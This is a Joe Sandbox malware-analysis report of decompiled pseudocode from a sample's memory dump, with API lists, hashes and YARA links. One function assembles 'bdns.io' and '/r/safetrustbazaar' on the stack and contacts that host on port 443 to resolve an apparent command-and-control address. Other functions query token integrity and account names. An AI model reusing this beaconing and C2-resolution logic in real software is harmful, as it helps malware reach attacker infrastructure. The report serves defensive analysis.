				E005CD8B0( &(_t128[2]));
				_t124 = 0x5d9bbc;
				 *0x5d9d54(0x5d9bbc);
				_t98 =  *0x5d9b7c; // 0x0
				 *0x5d9d9c(0x5d9bbc);
				if( *0x5d9ad0 == 0) {
					if( *(_t127 + 4) != 0) {
						_t124 =  &(_t128[8]);
						E005D4520(_t124, 0x6a);
						_t128 =  &(_t128[2]);
						if(lstrcmpiW( *(_t127 + 4), _t124) == 0) {
							 *0x5d9ad0 = 1;
						}
					}
				}
				if( *((intOrPtr*)(_t127 + 0x10)) == 0) {
					L8:
					_t120 =  *0x5d9d54;
					 *_t128 = 0;
					do {
						 *_t120(0x5d9bbc);
						_t55 =  *0x5d9ac8; // 0x0
						if(_t98 >= E005CC430( *((intOrPtr*)(_t55 + 0xc)))) {
							L30:
							 *0x5d9d9c(0x5d9bbc);
							L31:
							_t98 = 0;
							goto L32;
						}
						_t71 =  *0x5d9ac8; // 0x0
						_t72 = E005C42F0( *((intOrPtr*)(_t71 + 0xc)), _t98);
						_t114 =  *_t72;
						_t103 = 0xfffffc00;
						while(1) {
							_t121 =  *(_t114 + _t103 + 0x400) & 0x0000ffff;
							if(_t121 == 0) {
								break;
							}
							 *(_t128 + _t103 + 0x420) = _t121;
							_t103 = _t103 + 2;
							if(_t103 != 0) {
								continue;
							}
							_t120 =  *0x5d9d54;
							 *((short*)(_t128 + _t103 + 0x41e)) = 0;
							goto L30;
						}
						 *(_t128 + _t103 + 0x420) = 0;
						_t122 =  *(_t72 + 4) & 0x0000ffff;
						 *0x5d9d9c(0x5d9bbc);
						_t98 = _t98 + 1;
						if(_t98 == 0) {
							_t120 =  *0x5d9d54;
							goto L31;
						}
						_t125 = 0;
						while(E005CF070( &(_t128[2]),  &(_t128[9]), _t122 & 0x0000ffff) == 0) {
							_t125 = _t125 + 1;
							if(_t125 < 5) {
								continue;
							}
							L20:
							_t120 =  *0x5d9d54;
							if( *_t128 > 0x4af) {
								goto L33;
							}
							_t107 =  *_t128 + 1;
							 *_t128 = _t107;
							if(_t107 == (_t107 * 0x66666667 >> 0x20 >> 2) + (0x66666667 >> 0x1f) + (_t107 * 0x66666667 >> 0x20 >> 2) + (0x66666667 >> 0x1f) + 0x19999999c) {
								_push(0xea60);
							} else {
								_push(0xbb8);
							}
							Sleep();
							goto L32;
						}
						_t126 = 0;
						while(E005D4A60( &(_t128[8]),  *_t127,  *(_t127 + 4),  *((intOrPtr*)(_t127 + 8)),  *((intOrPtr*)(_t127 + 0xc)),  *((intOrPtr*)(_t127 + 0x10)),  *(_t127 + 0x14)) == 0) {
							Sleep(0x3e8);
							_t126 = _t126 + 1;
							if(_t126 < 3) {
								continue;
							}
							goto L20;
						}
						_t124 = 0;
						goto L20;
						L32:
					} while (_t124 > 0);
					L33:
					_t58 =  *_t127;
					if( *_t127 != 0) {
						E005C91E0(_t58);
						_t128 =  &(_t128[1]);
					}
					_t59 =  *(_t127 + 4);
					if( *(_t127 + 4) != 0) {
						E005C91E0(_t59);
						_t128 =  &(_t128[1]);
					}
					_t60 =  *((intOrPtr*)(_t127 + 8));
					if( *((intOrPtr*)(_t127 + 8)) != 0) {
						E005C91E0(_t60);
						_t128 =  &(_t128[1]);
					}
					_t61 =  *((intOrPtr*)(_t127 + 0x10));
					if( *((intOrPtr*)(_t127 + 0x10)) != 0) {
						E005C91E0(_t61);
						_t128 =  &(_t128[1]);
					}
					_t62 =  *((intOrPtr*)(_t127 + 0xc));
					if( *((intOrPtr*)(_t127 + 0xc)) != 0) {
						E005C91E0(_t62);
						_t128 =  &(_t128[1]);
					}
					E005C91E0(_t127);
					E005D19C0( &(_t128[3]));
					return 0;
				} else {
					_t84 =  *(_t127 + 0x14);
					if(_t84 < 0x100000) {
						goto L8;
					}
					_t124 = 0;
					_t128[1] = _t84 + (_t84 >> 4) + 0x4c;
					_t123 = E005C3180(_t84 + (_t84 >> 4) + 0x4c, 0);
					_t87 = E005C3180(0x10000, 0);
					_t128 =  &(_t128[4]);
					if(_t123 == 0) {
						goto L8;
					}
					_t124 = _t87;
					if(_t87 == 0) {
						goto L8;
					}
					E005D2BA0(0x1040, 2, 4, 4, 4, 4, 4, 4, 4, 4);
					_t131 =  &(_t128[0xa]);
					_t90 =  &(_t131[1]);
					 *_t90 =  *_t90 + 0xfffffff8;
					_push(_t124);
					_push(_t90);
					_push(_t123 + 8);
					_push( *(_t127 + 0x14));
					_push( *((intOrPtr*)(_t127 + 0x10)));
					_t91 = E005D35E0();
					_t132 =  &(_t131[5]);
					if(_t91 == 0) {
						 *_t123 = 0x4150495a;
						 *(_t123 + 4) =  *(_t127 + 0x14);
						 *((intOrPtr*)(_t127 + 0x10)) = _t123;
						_t123 =  *((intOrPtr*)(_t127 + 0x10));
						 *(_t127 + 0x14) = _t132[1] + 8;
					}
					E005C91E0(_t123);
					E005C91E0(_t124);
					_t128 =  &(_t132[2]);
					goto L8;
				}
			}

0x005d13aa
0x005d13b5
0x005d13ba
0x005d13c0
0x005d13c6
0x005d13cd
0x005d13da
0x005d1656
0x005d165c
0x005d1663
0x005d1668
0x005d1677
0x005d167d
0x005d167d
0x005d1677
0x005d1656
0x005d13e4
0x005d1498
0x005d1498
0x005d149e
0x005d1575
0x005d157a
0x005d157c
0x005d158b
0x005d15d0
0x005d15d5
0x005d15db
0x005d15db
0x00000000
0x005d15db
0x005d158d
0x005d1596
0x005d159b
0x005d159d
0x005d15a2
0x005d15a2
0x005d15ad
0x00000000
0x00000000
0x005d15b3
0x005d15bb
0x005d15be
0x00000000
0x00000000
0x005d15c0
0x005d15c6
0x00000000
0x005d15c6
0x005d14aa
0x005d14b4
0x005d14bd
0x005d14c3
0x005d14c4
0x005d14e6
0x00000000
0x005d14e6
0x005d14c6
0x005d14c8
0x005d14de
0x005d14e2
0x00000000
0x00000000
0x005d152b
0x005d1532
0x005d1538
0x00000000
0x00000000
0x005d1546
0x005d1549
0x005d155f
0x005d1568
0x005d1561
0x005d1561
0x005d1561
0x005d156d
0x00000000
0x005d156d
0x005d14f1
0x005d14f3
0x005d151b
0x005d1521
0x005d1525
0x00000000
0x00000000
0x00000000
0x005d1527
0x005d1529
0x00000000
0x005d15dd
0x005d15dd
0x005d15e1
0x005d15e1
0x005d15e6
0x005d15e9
0x005d15ee
0x005d15ee
0x005d15f1
0x005d15f6
0x005d15f9
0x005d15fe
0x005d15fe
0x005d1601
0x005d1606
0x005d1609
0x005d160e
0x005d160e
0x005d1611
0x005d1616
0x005d1619
0x005d161e
0x005d161e
0x005d1621
0x005d1626
0x005d1629
0x005d162e
0x005d162e
0x005d1632
0x005d163e
0x005d164f
0x005d13ea
0x005d13ea
0x005d13f2
0x00000000
0x00000000
0x005d13fa
0x005d1403
0x005d1411
0x005d1419
0x005d141e
0x005d1423
0x00000000
0x00000000
0x005d1425
0x005d1429
0x00000000
0x00000000
0x005d143f
0x005d1444
0x005d1447
0x005d144d
0x005d1453
0x005d1454
0x005d1455
0x005d1456
0x005d1459
0x005d145c
0x005d1461
0x005d1466
0x005d1468
0x005d1471
0x005d1477
0x005d147e
0x005d1483
0x005d1483
0x005d1487
0x005d1490
0x005d1495
0x00000000
0x005d1495

APIs

Part of subcall function 005CD8B0: InitializeCriticalSectionAndSpinCount.KERNEL32(005D9B64,00000800,?,00000000,00000000,00000000,00000000), ref: 005CD916
Part of subcall function 005CD8B0: RtlEnterCriticalSection.NTDLL(005D9B64), ref: 005CD928
Part of subcall function 005CD8B0: RtlLeaveCriticalSection.NTDLL(005D9B64), ref: 005CD93C

RtlEnterCriticalSection.NTDLL(005D9BBC), ref: 005D13C0
RtlLeaveCriticalSection.NTDLL(005D9BBC), ref: 005D13CD
RtlLeaveCriticalSection.NTDLL(005D9BBC), ref: 005D14BD
Sleep.KERNEL32(000003E8,?,?,00000000,?,?,00000000,?,?,00000000), ref: 005D151B
Sleep.KERNEL32(0000EA60,?,?,00000000,?,?,00000000,?,?,00000000), ref: 005D156D
RtlEnterCriticalSection.NTDLL(005D9BBC), ref: 005D157A
RtlLeaveCriticalSection.NTDLL(005D9BBC), ref: 005D15D5
lstrcmpiW.KERNEL32(00000000,?), ref: 005D166F

Strings

gfff, xrefs: 005D1541

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$Sleep$CountInitializeSpinlstrcmpi
String ID: gfff
API String ID: 4220677202-1553575800
Opcode ID: 4350914b4d6938443723becdb85ee9b487d4fd83eed34493bd110aa08a6d74c4
Instruction ID: 2f2ba7584aec10955660f4b6d6202a2e79d92af1814182749ab442f39ecf24fe
Opcode Fuzzy Hash: 4350914b4d6938443723becdb85ee9b487d4fd83eed34493bd110aa08a6d74c4
Instruction Fuzzy Hash: D67116B1604602AFDB30EF68EC49AAA3BA5BF94344F09442BF90697351E734D904CB96

Uniqueness

Uniqueness Score: -1.00%

Function 005C26D0, Relevance: 15.3, APIs: 10, Instructions: 323
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E005C26D0(intOrPtr* _a4, intOrPtr _a8, signed short* _a12) {
				void* _v16;
				char _v536;
				char _v1044;
				char _v1048;
				char _v1556;
				char _v1560;
				void _v1632;
				intOrPtr _v1636;
				char _v1694;
				signed short _v1696;
				char _v1712;
				struct _FILETIME _v1724;
				short _v1728;
				struct _SID_IDENTIFIER_AUTHORITY _v1732;
				char _v1736;
				char _v1740;
				intOrPtr _v1744;
				signed int _v1748;
				signed int _v1752;
				void* _v1756;
				void* _v1760;
				char _v1764;
				signed int _v1768;
				void* _t95;
				void* _t96;
				signed int _t109;
				signed int _t111;
				signed int _t112;
				signed int _t113;
				FILETIME* _t118;
				signed int _t129;
				signed int _t130;
				signed int _t131;
				signed int _t132;
				signed int* _t133;
				signed int _t138;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				WCHAR* _t143;
				signed int _t147;
				WCHAR* _t154;
				intOrPtr* _t155;
				signed short* _t156;
				signed short* _t164;
				signed int _t165;
				signed short* _t166;
				signed short* _t167;
				signed short* _t168;
				BYTE[6] _t176;
				long _t181;
				intOrPtr _t184;
				signed int* _t185;
				signed short* _t186;
				signed short* _t188;
				void* _t192;
				void* _t193;
				signed int* _t194;
				void* _t195;
				void* _t196;
				struct _SYSTEMTIME* _t197;
				signed int* _t199;
				signed int* _t200;
				WCHAR* _t201;
				signed int _t203;
				signed int* _t205;
				signed int* _t209;
				signed int* _t211;
				signed int* _t212;
				signed int* _t216;
				signed int* _t217;
				signed int* _t221;
				signed int* _t222;
				signed int* _t223;

				_t205 = (_t203 & 0xfffffff8) - 0x6d8;
				_t181 = 0;
				_t176 =  *0x5d9c34; // 0x0
				_v1756 = 0;
				_v1724.dwLowDateTime = 0;
				_v1760 = 0;
				_v1764 = 0x200;
				_v1768 = 0x200;
				_v1728 =  *0x5d9c38 & 0x0000ffff;
				_v1732.Value = _t176;
				if(_a8 == 0) {
					if(OpenProcessToken(GetCurrentProcess(), 8,  &_v1756) == 0 || GetTokenInformation(_v1756, 1,  &_v1632, 0x4c,  &_v1724) == 0) {
						L33:
						_t95 = _v1760;
						if(_t95 != 0) {
							FreeSid(_t95);
						}
						_t96 = _v1756;
						if(_t96 != 0) {
							CloseHandle(_t96);
						}
						goto L37;
					} else {
						_push( &_v1740);
						_push(_t205);
						_push( &_v1560);
						_push( &_v1768);
						_push( &_v1048);
						_push(_v1636);
						L6:
						if(LookupAccountSidW(0, ??, ??, ??, ??, ??, ??) == 0) {
							_t181 = 0;
							L37:
							return _t181;
						}
						_t104 = _v1768;
						_t154 = 0;
						if(_v1768 != 0) {
							_t169 =  *_t205;
							_t154 = 0;
							if( *_t205 != 0) {
								_t143 = E005C3180(_t169 + _t104 + _t169 + _t104 + 4, 0);
								_t222 =  &(_t205[2]);
								_t154 = _t143;
								E005CC400(_t154,  &_v1560,  *_t222 +  *_t222);
								_t223 =  &(_t222[3]);
								_t147 =  *_t223;
								_t201 =  &(_t154[_t147]);
								_t32 = _t147 * 2; // 0x2
								 *_t201 = 0x5c;
								E005CC400(_t154 + _t32 + 2,  &_v1048, _v1768 + _v1768);
								_t205 =  &(_t223[3]);
								 *((short*)(_t201 + 2 + _v1768 * 2)) = 0;
							}
						}
						_t162 =  !=  ? 0x32 : 0x33;
						_v1756 = E005C5B70( !=  ? 0x32 : 0x33);
						_t184 = E005C3180(0x7d00, 0);
						_t109 = E005D4520(_t108, 0x34);
						_t209 =  &(_t205[5]);
						_t192 = _t184 + _t109 * 2;
						_v1744 = _t184;
						if(_a8 == 0) {
							_t193 = _t192 + E005D4520(_t192, 0x36) * 2;
							_t111 = E005D4520(_t193, 0x37);
							_t211 =  &(_t209[4]);
							_t194 = _t193 + _t111 * 2;
							_t112 =  *_t154 & 0x0000ffff;
							if(_t112 == 0) {
								L16:
								_t113 = E005D4520(_t194, 0x38);
								_t212 =  &(_t211[2]);
								_t195 = _t194 + _t113 * 2;
								_push(0x39);
								goto L17;
							}
							_t168 =  &(_t154[1]);
							do {
								 *_t194 = _t112;
								_t194 =  &(_t194[0]);
								_t112 =  *_t168 & 0x0000ffff;
								_t168 =  &(_t168[1]);
							} while (_t112 != 0);
							goto L16;
						} else {
							_t141 = E005D4520(_t192, 0x35);
							_t212 =  &(_t209[2]);
							_t195 = _t192 + _t141 * 2;
							_push(0x3a);
							L17:
							_push(_t195);
							_t196 = _t195 + E005D4520() * 2;
							_t185 = _t196 + E005D4520(_t196, 0x3b) * 2;
							_t197 =  &_v1712;
							GetLocalTime(_t197);
							SystemTimeToFileTime(_t197,  &_v1724);
							_t118 =  &_v1724;
							_t118->dwLowDateTime = _t118->dwLowDateTime + 0x23c34600;
							asm("adc dword [eax+0x4], 0x0");
							FileTimeToSystemTime(_t118, _t197);
							E005D4520( &_v536, 0x3c);
							_v1752 = _t197->wSecond & 0x0000ffff;
							_v1748 = _t197->wDay & 0x0000ffff;
							_push(_v1752);
							_push(_t197->wMinute & 0x0000ffff);
							_push(_t197->wHour & 0x0000ffff);
							_push(_v1748);
							_push(_t197->wMonth & 0x0000ffff);
							E005D68E0( &_v1696, 0x1a,  &_v536, _t197->wYear & 0x0000ffff);
							_t216 =  &(_t212[0xf]);
							_t129 = _v1696 & 0x0000ffff;
							if(_t129 == 0) {
								L20:
								_t130 = E005D4520(_t185, 0x3d);
								_t217 =  &(_t216[2]);
								_t164 = _v1756;
								_t199 = _t185 + _t130 * 2;
								_t131 =  *_t164 & 0x0000ffff;
								if(_t131 == 0) {
									L23:
									_t186 = _a12;
									if(_a8 != 0) {
										L28:
										_t155 = _a4;
										_t132 = E005D4520(_t199, 0x3e);
										_t165 =  *_t186 & 0x0000ffff;
										_t133 = _t199 + _t132 * 2;
										if(_t165 == 0) {
											L31:
											E005D4520(_t133, 0x3f);
											_t181 = 1;
											 *_t155 = _v1744;
											_t136 = _v1756;
											if(_v1756 != 0) {
												E005C91E0(_t136);
											}
											goto L33;
										}
										_t188 =  &(_t186[1]);
										do {
											 *_t133 = _t165;
											_t133 =  &(_t133[0]);
											_t165 =  *_t188 & 0x0000ffff;
											_t188 =  &(_t188[1]);
										} while (_t165 != 0);
										goto L31;
									}
									_t138 = E005D4520(_t199, 0x37);
									_t221 =  &(_t217[2]);
									_t200 = _t199 + _t138 * 2;
									_t139 =  *_t154 & 0x0000ffff;
									if(_t139 == 0) {
										L27:
										_t140 = E005D4520(_t200, 0x38);
										_t217 =  &(_t221[2]);
										_t199 = _t200 + _t140 * 2;
										goto L28;
									}
									_t156 =  &(_t154[1]);
									do {
										 *_t200 = _t139;
										_t200 =  &(_t200[0]);
										_t139 =  *_t156 & 0x0000ffff;
										_t156 =  &(_t156[1]);
									} while (_t139 != 0);
									goto L27;
								}
								_t166 =  &(_t164[1]);
								do {
									 *_t199 = _t131;
									_t199 =  &(_t199[0]);
									_t131 =  *_t166 & 0x0000ffff;
									_t166 =  &(_t166[1]);
								} while (_t131 != 0);
								goto L23;
							}
							_t167 =  &_v1694;
							do {
								 *_t185 = _t129;
								_t185 =  &(_t185[0]);
								_t129 =  *_t167 & 0x0000ffff;
								_t167 =  &(_t167[1]);
							} while (_t129 != 0);
							goto L20;
						}
					}
				}
				_t181 = 0;
				if(AllocateAndInitializeSid( &_v1732, 1, 0x12, 0, 0, 0, 0, 0, 0, 0,  &_v1760) == 0) {
					goto L33;
				} else {
					_push( &_v1736);
					_push(_t205);
					_push( &_v1556);
					_push( &_v1764);
					_push( &_v1044);
					_push(_v1760);
					goto L6;
				}
			}

0x005c26d9
0x005c26df
0x005c26e8
0x005c26f7
0x005c26fb
0x005c26ff
0x005c2703
0x005c2707
0x005c270a
0x005c270f
0x005c2713
0x005c2773
0x005c2a6c
0x005c2a6c
0x005c2a72
0x005c2a75
0x005c2a75
0x005c2a7b
0x005c2a81
0x005c2a84
0x005c2a84
0x00000000
0x005c279c
0x005c27b4
0x005c27b5
0x005c27b6
0x005c27b7
0x005c27b8
0x005c27b9
0x005c27c0
0x005c27ca
0x005c28a0
0x005c2a8a
0x005c2a93
0x005c2a93
0x005c27d0
0x005c27d6
0x005c27dd
0x005c27df
0x005c27e2
0x005c27e9
0x005c27f4
0x005c27f9
0x005c27fc
0x005c280d
0x005c2812
0x005c2815
0x005c281f
0x005c2822
0x005c2826
0x005c2834
0x005c2839
0x005c2840
0x005c2840
0x005c27e9
0x005c2858
0x005c2864
0x005c2876
0x005c287b
0x005c2880
0x005c2885
0x005c2888
0x005c288c
0x005c28b2
0x005c28b8
0x005c28bd
0x005c28c0
0x005c28c3
0x005c28c9
0x005c28df
0x005c28e2
0x005c28e7
0x005c28ea
0x005c28ed
0x00000000
0x005c28ed
0x005c28cb
0x005c28ce
0x005c28ce
0x005c28d1
0x005c28d4
0x005c28d7
0x005c28da
0x00000000
0x005c288e
0x005c2891
0x005c2896
0x005c2899
0x005c289c
0x005c28ef
0x005c28ef
0x005c28f8
0x005c2906
0x005c2909
0x005c290e
0x005c291a
0x005c2920
0x005c2924
0x005c292a
0x005c2930
0x005c2940
0x005c2954
0x005c295c
0x005c2967
0x005c296b
0x005c296c
0x005c296d
0x005c2971
0x005c2982
0x005c2987
0x005c298e
0x005c2994
0x005c29ab
0x005c29ae
0x005c29b3
0x005c29b6
0x005c29ba
0x005c29bd
0x005c29c3
0x005c29d9
0x005c29d9
0x005c29e0
0x005c2a1a
0x005c2a1a
0x005c2a20
0x005c2a28
0x005c2a2b
0x005c2a31
0x005c2a47
0x005c2a4a
0x005c2a58
0x005c2a59
0x005c2a5b
0x005c2a61
0x005c2a64
0x005c2a69
0x00000000
0x005c2a61
0x005c2a33
0x005c2a36
0x005c2a36
0x005c2a39
0x005c2a3c
0x005c2a3f
0x005c2a42
0x00000000
0x005c2a36
0x005c29e5
0x005c29ea
0x005c29ed
0x005c29f0
0x005c29f6
0x005c2a0c
0x005c2a0f
0x005c2a14
0x005c2a17
0x00000000
0x005c2a17
0x005c29f8
0x005c29fb
0x005c29fb
0x005c29fe
0x005c2a01
0x005c2a04
0x005c2a07
0x00000000
0x005c29fb
0x005c29c5
0x005c29c8
0x005c29c8
0x005c29cb
0x005c29ce
0x005c29d1
0x005c29d4
0x00000000
0x005c29c8
0x005c2996
0x005c299a
0x005c299a
0x005c299d
0x005c29a0
0x005c29a3
0x005c29a6
0x00000000
0x005c299a
0x005c288c
0x005c2773
0x005c2719
0x005c2734
0x00000000
0x005c273a
0x005c2752
0x005c2753
0x005c2754
0x005c2755
0x005c2756
0x005c2757
0x00000000
0x005c2757

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 005C272C
GetCurrentProcess.KERNEL32 ref: 005C275D
OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 005C276B
GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),?,0000004C,?), ref: 005C278E
LookupAccountSidW.ADVAPI32(00000000,?,?,?,?,?,?), ref: 005C27C2
GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005C290E
SystemTimeToFileTime.KERNEL32(?,?), ref: 005C291A
FileTimeToSystemTime.KERNEL32(?,?), ref: 005C2930

Part of subcall function 005D68E0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000400), ref: 005D6A15

FreeSid.ADVAPI32(?), ref: 005C2A75
CloseHandle.KERNEL32(?), ref: 005C2A84

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: Time$FileProcessSystemToken$AccountAllocateByteCharCloseCurrentFreeHandleInformationInitializeLocalLookupMultiOpenWide
String ID:
API String ID: 348365884-0
Opcode ID: 68ce46df76bbdd3d096f629bbe634598d1fa1f0430b09053e6e0fd5773cb5edb
Instruction ID: abda0d0b1c8123908e9e669ff0e17c2794b9715fa2e52ea0fac46dc509118419
Opcode Fuzzy Hash: 68ce46df76bbdd3d096f629bbe634598d1fa1f0430b09053e6e0fd5773cb5edb
Instruction Fuzzy Hash: CEB1AE71904312AFDB209F54DC45B7BBBE8FF90705F00481EF989A7281E775AA05CB62

Uniqueness

Uniqueness Score: -1.00%

Function 005CAB60, Relevance: 15.2, APIs: 5, Strings: 5, Instructions: 225
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E005CAB60(void* __eflags) {
				void* _t42;
				void* _t55;
				signed int _t59;
				signed int _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t64;
				signed int _t65;
				signed int* _t72;
				signed int _t73;
				void* _t74;
				void* _t82;
				signed int _t89;
				signed int _t90;
				void* _t91;
				signed int _t95;
				signed int _t96;
				signed int _t97;
				signed int _t98;
				signed int _t100;
				signed int _t103;
				signed int _t104;
				signed int* _t105;

				_t94 =  &(_t105[9]);
				E005CD8B0( &(_t105[9]));
				_t99 =  &(_t105[4]);
				_t72 =  &(_t105[0xf]);
				_t104 = 0;
				 *_t105 = 0;
				_t105[3] = 0;
				_t105[4] = 0;
				_t105[2] = 0;
				_t105[1] = 0;
				while(1) {
					_t105[0x10] = 0x6f692e;
					_t105[0xf] = 0x736e6462;
					_t42 = E005CC380(_t72, 0xfde9, _t99, 0xffffffff);
					_t105 =  &(_t105[4]);
					if(_t42 == 0) {
						break;
					}
					if(E005CF070(_t94, _t105[5], 0x1bb) == 0) {
						L6:
						_t104 = _t104 + 1;
						Sleep(0x4e20);
						if(_t104 < 0x1e) {
							continue;
						}
						break;
					}
					_t105[0x13] = 0x7261;
					_t105[0x12] = 0x7a61622e;
					_t105[0x11] = 0x74737572;
					_t105[0x10] = 0x74656661;
					_t105[0xf] = 0x732f722f;
					_t55 = E005CC380(_t72, 0xfde9,  &(_t105[3]), 0xffffffff);
					_t105 =  &(_t105[4]);
					if(_t55 == 0) {
						break;
					}
					if(E005C5A50(_t94, _t105[3],  &(_t105[7])) == 0 || _t105[7] != 0xc8) {
						goto L6;
					} else {
						_t59 = E005C7F10( &(_t105[9]),  &(_t105[1]),  &(_t105[8]));
						__eflags = _t59;
						if(_t59 == 0) {
							break;
						}
						_t89 = _t105[8];
						__eflags = _t89 - 7;
						if(_t89 < 7) {
							break;
						}
						_t60 = _t105[1];
						__eflags = _t89;
						_t82 = _t60 + _t89;
						if(_t89 <= 0) {
							L21:
							__eflags = _t60 - _t82;
							_t90 = _t60;
							if(_t60 >= _t82) {
								L26:
								_t91 = _t90 - _t60;
								__eflags = _t91 - 7 - 8;
								if(_t91 - 7 > 8) {
									break;
								}
								_t61 = E005CC380(_t60, 0,  &(_t105[3]), _t91);
								_t105 =  &(_t105[4]);
								_t73 = _t105[0x2d];
								__eflags = _t61;
								if(_t61 == 0) {
									break;
								}
								_t100 = 0;
								__eflags = 0;
								while(1) {
									_t62 = E005D6BD0(_t73, __eflags, _t105[4], 0x1bb);
									__eflags = _t62;
									if(_t62 != 0) {
										break;
									}
									_t100 = _t100 + 1;
									Sleep(0x7530);
									__eflags = _t100 - 0x14;
									if(__eflags < 0) {
										continue;
									}
									__eflags = _t100 - 0x14;
									 *_t105 = 0;
									if(_t100 == 0x14) {
										goto L7;
									}
									break;
								}
								_t101 =  &(_t105[6]);
								_t95 = 0;
								__eflags = 0;
								_t105[6] = 0;
								while(1) {
									_t63 = E005C5960(__eflags, _t73, _t101);
									_t105 =  &(_t105[2]);
									__eflags = _t63;
									if(_t63 == 0) {
										break;
									}
									_t95 = _t95 + 1;
									Sleep(0x7530);
									__eflags = _t95 - 0x14;
									if(__eflags < 0) {
										continue;
									}
									if(__eflags != 0) {
										L39:
										_t102 =  &(_t105[5]);
										_t97 = 0;
										__eflags = 0;
										_t105[5] = 0;
										while(1) {
											_t64 = E005C3C40(_t73, _t102);
											_t105 =  &(_t105[2]);
											__eflags = _t64;
											if(_t64 == 0) {
												break;
											}
											_t97 = _t97 + 1;
											Sleep(0x7530);
											__eflags = _t97 - 0x14;
											if(__eflags < 0) {
												continue;
											}
											if(__eflags != 0) {
												L46:
												_t103 = 0;
												__eflags = 0;
												while(1) {
													_t65 = E005C9060(_t73, 0x5d9ac8);
													_t105 =  &(_t105[2]);
													__eflags = _t65;
													if(_t65 != 0) {
														break;
													}
													_t103 = _t103 + 1;
													Sleep(0x7530);
													__eflags = _t103 - 0x64;
													if(_t103 < 0x64) {
														continue;
													}
													break;
												}
												__eflags = _t103 - 0x64;
												 *_t105 = 0 | _t103 != 0x00000064;
												goto L7;
											}
											L43:
											 *_t105 = 0;
											goto L7;
										}
										_t98 = _t105[5];
										__eflags = _t98;
										if(_t98 != 0) {
											E005C9510(_t98);
											L005D7400(_t98);
											_t105 =  &(_t105[1]);
										}
										goto L46;
									}
									goto L43;
								}
								_t96 = _t105[6];
								__eflags = _t96;
								if(_t96 != 0) {
									L005D1F70(_t63);
									L005D7400(_t96);
									_t105 =  &(_t105[1]);
								}
								goto L39;
							}
							_t90 = _t60;
							do {
								_t74 =  *_t90;
								__eflags = _t74 - 0x2e;
								if(_t74 == 0x2e) {
									goto L25;
								}
								__eflags = _t74 + 0xd0 - 9;
								if(_t74 + 0xd0 > 9) {
									goto L26;
								}
								L25:
								_t90 = _t90 + 1;
								__eflags = _t90 - _t82;
							} while (_t90 < _t82);
							goto L26;
						} else {
							goto L19;
						}
						while(1) {
							L19:
							__eflags =  *_t60 + 0xd0 - 0xa;
							if( *_t60 + 0xd0 < 0xa) {
								goto L21;
							}
							_t60 = _t60 + 1;
							__eflags = _t60 - _t82;
							if(_t60 < _t82) {
								continue;
							}
							goto L21;
						}
						goto L21;
					}
				}
				L7:
				_t43 = _t105[3];
				if(_t105[3] != 0) {
					E005C91E0(_t43);
					_t105 =  &(_t105[1]);
				}
				_t44 = _t105[4];
				if(_t105[4] != 0) {
					E005C91E0(_t44);
					_t105 =  &(_t105[1]);
				}
				_t45 = _t105[2];
				if(_t105[2] != 0) {
					E005C91E0(_t45);
					_t105 =  &(_t105[1]);
				}
				_t46 = _t105[1];
				if(_t105[1] != 0) {
					E005C91E0(_t46);
					_t105 =  &(_t105[1]);
				}
				E005D19C0( &(_t105[9]));
				return  *_t105;
			}

0x005cab6a
0x005cab70
0x005cab77
0x005cab7f
0x005cab83
0x005cab85
0x005cab8c
0x005cab90
0x005cab92
0x005cab94
0x005cab98
0x005cab98
0x005caba0
0x005cabb1
0x005cabb6
0x005cabbb
0x00000000
0x00000000
0x005cabd3
0x005cac34
0x005cac34
0x005cac3a
0x005cac43
0x00000000
0x00000000
0x00000000
0x005cac43
0x005cabd5
0x005cabdd
0x005cabe5
0x005cabed
0x005cabf5
0x005cac0a
0x005cac0f
0x005cac14
0x00000000
0x00000000
0x005cac28
0x00000000
0x005caca4
0x005cacb2
0x005cacb7
0x005cacb9
0x00000000
0x00000000
0x005cacbb
0x005cacbf
0x005cacc2
0x00000000
0x00000000
0x005cacc4
0x005cacc8
0x005cacca
0x005caccd
0x005cacde
0x005cacde
0x005cace0
0x005cace2
0x005cacfa
0x005cacfa
0x005cacff
0x005cad02
0x00000000
0x00000000
0x005cad11
0x005cad16
0x005cad19
0x005cad20
0x005cad22
0x00000000
0x00000000
0x005cad28
0x005cad28
0x005cad2a
0x005cad35
0x005cad3a
0x005cad3c
0x00000000
0x00000000
0x005cad3e
0x005cad44
0x005cad4a
0x005cad4d
0x00000000
0x00000000
0x005cad4f
0x005cad52
0x005cad59
0x00000000
0x00000000
0x00000000
0x005cad59
0x005cad5f
0x005cad63
0x005cad63
0x005cad65
0x005cad6b
0x005cad6d
0x005cad72
0x005cad75
0x005cad77
0x00000000
0x00000000
0x005cad79
0x005cad7f
0x005cad85
0x005cad88
0x00000000
0x00000000
0x005cad8a
0x005cada6
0x005cada6
0x005cadaa
0x005cadaa
0x005cadac
0x005cadb2
0x005cadb4
0x005cadb9
0x005cadbc
0x005cadbe
0x00000000
0x00000000
0x005cadc0
0x005cadc6
0x005cadcc
0x005cadcf
0x00000000
0x00000000
0x005cadd1
0x005cadf7
0x005cadf7
0x005cadf7
0x005cadf9
0x005cadff
0x005cae04
0x005cae07
